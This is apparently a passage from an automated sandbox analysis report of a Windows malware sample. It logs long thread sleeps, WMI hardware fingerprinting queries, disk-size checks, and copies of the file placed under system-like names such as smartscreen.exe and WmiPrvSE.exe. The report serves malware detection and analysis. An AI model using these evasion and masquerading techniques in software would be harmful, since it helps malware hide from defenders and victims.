                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952Thread sleep time: -584125s >= -30000s
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952Thread sleep time: -583953s >= -30000s
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952Thread sleep time: -583500s >= -30000s
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952Thread sleep time: -583371s >= -30000s
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952Thread sleep time: -582766s >= -30000s
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952Thread sleep time: -582531s >= -30000s
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952Thread sleep time: -582396s >= -30000s
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952Thread sleep time: -581172s >= -30000s
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952Thread sleep time: -579531s >= -30000s
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952Thread sleep time: -579234s >= -30000s
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952Thread sleep time: -579022s >= -30000s
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952Thread sleep time: -578594s >= -30000s
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952Thread sleep time: -578247s >= -30000s
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952Thread sleep time: -578062s >= -30000s
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952Thread sleep time: -577641s >= -30000s
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952Thread sleep time: -576484s >= -30000s
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952Thread sleep time: -576234s >= -30000s
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952Thread sleep time: -576086s >= -30000s
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952Thread sleep time: -575939s >= -30000s
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952Thread sleep time: -575793s >= -30000s
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952Thread sleep time: -575685s >= -30000s
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952Thread sleep time: -575566s >= -30000s
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952Thread sleep time: -575395s >= -30000s
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952Thread sleep time: -575237s >= -30000s
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952Thread sleep time: -575122s >= -30000s
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952Thread sleep time: -574993s >= -30000s
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952Thread sleep time: -574219s >= -30000s
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952Thread sleep time: -574040s >= -30000s
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952Thread sleep time: -573725s >= -30000s
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952Thread sleep time: -573437s >= -30000s
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952Thread sleep time: -573062s >= -30000s
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952Thread sleep time: -572828s >= -30000s
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952Thread sleep time: -572422s >= -30000s
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952Thread sleep time: -572196s >= -30000s
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952Thread sleep time: -572016s >= -30000s
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952Thread sleep time: -571797s >= -30000s
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952Thread sleep time: -571453s >= -30000s
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952Thread sleep time: -571222s >= -30000s
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952Thread sleep time: -570984s >= -30000s
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952Thread sleep time: -570812s >= -30000s
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952Thread sleep time: -570547s >= -30000s
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952Thread sleep time: -569516s >= -30000s
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952Thread sleep time: -568964s >= -30000s
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952Thread sleep time: -568687s >= -30000s
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952Thread sleep time: -568394s >= -30000s
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952Thread sleep time: -568178s >= -30000s
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952Thread sleep time: -568036s >= -30000s
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952Thread sleep time: -567902s >= -30000s
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952Thread sleep time: -567680s >= -30000s
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952Thread sleep time: -566844s >= -30000s
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952Thread sleep time: -566699s >= -30000s
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952Thread sleep time: -566420s >= -30000s
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952Thread sleep time: -566281s >= -30000s
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952Thread sleep time: -566141s >= -30000s
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952Thread sleep time: -565964s >= -30000s
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952Thread sleep time: -565816s >= -30000s
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952Thread sleep time: -565702s >= -30000s
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952Thread sleep time: -565509s >= -30000s
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952Thread sleep time: -565406s >= -30000s
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952Thread sleep time: -565199s >= -30000s
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952Thread sleep time: -565014s >= -30000s
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952Thread sleep time: -564885s >= -30000s
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952Thread sleep time: -564781s >= -30000s
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952Thread sleep time: -564669s >= -30000s
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952Thread sleep time: -564560s >= -30000s
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952Thread sleep time: -564452s >= -30000s
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952Thread sleep time: -564343s >= -30000s
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952Thread sleep time: -564234s >= -30000s
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952Thread sleep time: -564125s >= -30000s
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952Thread sleep time: -564016s >= -30000s
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952Thread sleep time: -563906s >= -30000s
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952Thread sleep time: -563797s >= -30000s
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952Thread sleep time: -563683s >= -30000s
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952Thread sleep time: -563566s >= -30000s
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952Thread sleep time: -563453s >= -30000s
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952Thread sleep time: -563341s >= -30000s
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952Thread sleep time: -563234s >= -30000s
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952Thread sleep time: -563125s >= -30000s
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952Thread sleep time: -562002s >= -30000s
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952Thread sleep time: -561887s >= -30000s
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952Thread sleep time: -561780s >= -30000s
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952Thread sleep time: -561672s >= -30000s
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952Thread sleep time: -561562s >= -30000s
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952Thread sleep time: -561438s >= -30000s
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952Thread sleep time: -561328s >= -30000s
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952Thread sleep time: -561157s >= -30000s
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952Thread sleep time: -561047s >= -30000s
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952Thread sleep time: -560934s >= -30000s
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952Thread sleep time: -560817s >= -30000s
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952Thread sleep time: -560703s >= -30000s
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952Thread sleep time: -560585s >= -30000s
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952Thread sleep time: -559885s >= -30000s
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952Thread sleep time: -559757s >= -30000s
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 8420Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\Downloads\smartscreen.exe TID: 8112Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\Downloads\smartscreen.exe TID: 8408Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Recovery\WmiPrvSE.exe TID: 8104Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Recovery\WmiPrvSE.exe TID: 8424Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 5292Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8684Thread sleep count: 2103 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9856Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9508Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4708Thread sleep count: 2196 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9900Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9548Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9220Thread sleep count: 2087 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 10084Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9680Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9224Thread sleep count: 2269 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 10088Thread sleep time: -2767011611056431s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9672Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9276Thread sleep count: 1867 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9968Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9724Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9360Thread sleep count: 1949 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9964Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9600Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9408Thread sleep count: 2441 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 10108Thread sleep time: -4611686018427385s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 10108Thread sleep time: -30000s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9824Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9444Thread sleep count: 1950 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9884Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9556Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9424Thread sleep count: 2042 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 10104Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9800Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9448Thread sleep count: 2068 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 10120Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9792Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9488Thread sleep count: 2012 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 10100Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9816Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9492Thread sleep count: 2423 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 10116Thread sleep time: -5534023222112862s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 10116Thread sleep time: -30000s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9808Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\svchost.exe TID: 10032Thread sleep time: -30000s >= -30000s
                            Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Users\user\Downloads\smartscreen.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Users\user\Downloads\smartscreen.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Recovery\WmiPrvSE.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Recovery\WmiPrvSE.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeThread delayed: delay time: 600000Jump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeThread delayed: delay time: 599719Jump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeThread delayed: delay time: 599516Jump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeThread delayed: delay time: 599297Jump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeThread delayed: delay time: 599078Jump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeThread delayed: delay time: 598469Jump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeThread delayed: delay time: 598125Jump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeThread delayed: delay time: 597942Jump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeThread delayed: delay time: 100000Jump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeThread delayed: delay time: 99812Jump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeThread delayed: delay time: 99636Jump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeThread delayed: delay time: 99438Jump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeThread delayed: delay time: 99250Jump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeThread delayed: delay time: 99070Jump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeThread delayed: delay time: 98929Jump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeThread delayed: delay time: 98782Jump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeThread delayed: delay time: 98657Jump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeThread delayed: delay time: 98530Jump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeThread delayed: delay time: 595688Jump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeThread delayed: delay time: 595529Jump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeThread delayed: delay time: 595328Jump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeThread delayed: delay time: 595125Jump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 30000
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 600000
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 599562
